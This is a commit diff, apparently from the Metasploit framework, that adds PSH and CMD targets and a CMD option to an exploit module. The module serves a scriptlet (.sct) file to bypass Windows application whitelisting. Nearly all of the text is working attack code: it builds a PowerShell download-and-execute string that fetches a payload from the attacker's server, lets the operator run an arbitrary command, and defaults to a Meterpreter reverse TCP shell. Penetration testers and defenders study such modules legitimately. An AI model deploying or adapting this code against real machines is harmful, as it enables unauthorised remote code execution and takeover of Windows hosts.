Added command option

bug/bundler_fix
Trenton Ivey 2016-06-11 18:07:24 -05:00
parent 6af3c4ab99
commit 46eff4c96d
1 changed files with 22 additions and 10 deletions

View File

@ -32,7 +32,10 @@ class MetasploitModule < Msf::Exploit::Remote
{
'Payload' => 'windows/meterpreter/reverse_tcp'
},
'Targets' => [['Windows', {}]],
'Targets' => [
['PSH', {}],
['CMD', {}]
],
'Platform' => %w(win),
'Arch' => [ARCH_X86, ARCH_X86_64],
'DefaultTarget' => 0,
@ -42,6 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html']
]
))
register_options(
[
OptString.new('CMD',[false, 'The command to execute (For use with the CMD Target option only)',''])
])
end
@ -66,6 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
def serve_sct_file
print_status("Handling request for the .sct file from #{cli.peerhost}")
url = get_uri
case target.name
when 'PSH'
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)
download_and_run = "#{ignore_cert}#{download_string}"
@ -75,6 +84,9 @@ class MetasploitModule < Msf::Exploit::Remote
command: download_and_run
)
data = gen_sct_file(psh_command)
when 'CMD'
data = gen_sct_file(datastore['CMD'])
end
send_response(cli, data, 'Content-Type' => 'text/plain')
end